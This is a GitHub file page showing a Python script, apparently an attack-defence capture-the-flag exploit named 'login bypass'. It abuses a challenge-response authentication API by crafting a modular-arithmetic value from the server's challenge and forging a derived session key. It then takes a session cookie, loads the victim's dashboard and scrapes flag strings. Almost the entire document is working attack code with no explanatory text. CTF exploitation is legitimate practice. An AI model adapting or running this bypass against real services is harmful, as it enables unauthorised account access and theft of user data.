This repository has been archived by the owner on Sep 14, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit2-login-bypass.py
57 lines (46 loc) · 2.16 KB
/
exploit2-login-bypass.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
import sys
import requests
import hashlib
from Crypto.Protocol.KDF import HKDF
from Crypto.Hash import SHA256
import re
import json
p = 139819559489970727773674514602432894408386272642962276533082166612215714937961147220287901099797128817068030425326484141320785278983839593637016322911208624564325864627844438289920030667788568549384478133762504762305164349026988017587624141607584664958660506073490093963772276523455507226281029423012934325287
q = 69909779744985363886837257301216447204193136321481138266541083306107857468980573610143950549898564408534015212663242070660392639491919796818508161455604312282162932313922219144960015333894284274692239066881252381152582174513494008793812070803792332479330253036745046981886138261727753613140514711506467162643
port = 80
def exploit(ip, flag_id):
flag_id = json.loads(flag_id)
flag_id = flag_id["user"]
alpha = "1234"
payload1 = {
"user_id" : flag_id,
"alpha" : alpha,
"X_u" : "1234"
}
base_url = f"http://{ip}:{port}/"
ch = requests.post(base_url + f"api/auth/user/{flag_id}/challenge", json = payload1)
# print(ch.json())
ch = ch.json()
P_u = int(bytes.fromhex(ch["C"]).split(b"|")[-2])
id1 = hashlib.sha256(flag_id.encode() + alpha.encode()).hexdigest().upper()
d = pow(int(hashlib.sha256(id1.encode()).hexdigest(), 16), 2, q)
crafted_X_u = pow(pow(P_u, d, p), -1, p)
payload2 = {
"user_id" : flag_id,
"alpha" : alpha,
"X_u" : str(crafted_X_u)
}
step1 = requests.post(base_url + f"api/auth/user/{flag_id}/challenge", json = payload2)
K_sess = hashlib.sha256(b"1").hexdigest().upper().encode()
derived = HKDF(K_sess, 32, b"0", SHA256, 1, id1.encode()).hex().upper()
ss_id = step1.json()["ss_id"]
step2 = requests.post(base_url + f"api/auth/user/{flag_id}/session", json = {"A_u" : derived, "ss_id" : ss_id})
cookie = step2.json()["token"]
step3 = requests.get(base_url + "/dashboard", cookies = {"session":cookie})
flags = re.findall(r"[A-Z0-9]{31}=", step3.text)
return flags
if __name__ == "__main__":
ip = sys.argv[1]
flag_id = sys.argv[2]
print(exploit(ip, flag_id))